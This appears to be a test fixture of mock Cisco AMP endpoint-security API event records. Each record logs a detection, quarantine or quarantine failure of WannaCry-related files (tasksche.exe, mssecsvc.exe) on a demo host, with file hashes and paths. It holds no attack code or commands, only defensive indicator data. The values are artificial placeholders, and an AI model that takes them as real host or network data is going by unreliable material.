pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6419179209167470600","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":797000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405206","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":610000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405205","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":563000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405204","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":439000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405203","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":407000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405202","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":361000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405201","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405200","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":251000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179217757405199","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503298","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179217757405000,"timestamp":1610623597,"timestamp_nanoseconds":329000000,"date":"2021-01-14T11:26:37+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503301","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":893000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437902","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437901","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":846000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437900","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":456000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179213462437899","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179213462438000,"timestamp":1610623596,"timestamp_nanoseconds":643000000,"date":"2021-01-14T11:26:36+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6419179204872503299","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":957000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470602","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470598","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":941000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6419179209167470601","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":894000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179204872503300","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\WINDOWS\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3020,"disposition":"Malicious","file_name":"mssecsvc.exe","identity":{"sha256":"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c","sha1":"e889544aff85ffaf8b0d0da705105dee7c97fe26","md5":"db349b97c37d22f5ea1d1841e3c89eb4"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6419179209167471000,"timestamp":1610623595,"timestamp_nanoseconds":879000000,"date":"2021-01-14T11:26:35+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.ED01EBFBC9-100.SBX.TG","detection_id":"6419179209167470599","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_WannaCry_Ransomware","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"53:74:31:cb:37:50"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"tasksche.exe","file_path":"\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe","identity":{"sha256":"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa","sha1":"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467","md5":"84c82835a5d21bbcf75a61706d8ab549"},"parent":{"process_id":3808,"disposition":"Clean","file_name":"cmd.exe","identity":{"sha256":"17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae","sha1":"ee8cbf12d87c4d388f09b4f69bed2e91682920b5","md5":"ad7b9c14083b52bc532fba5948342b98"}}}}} 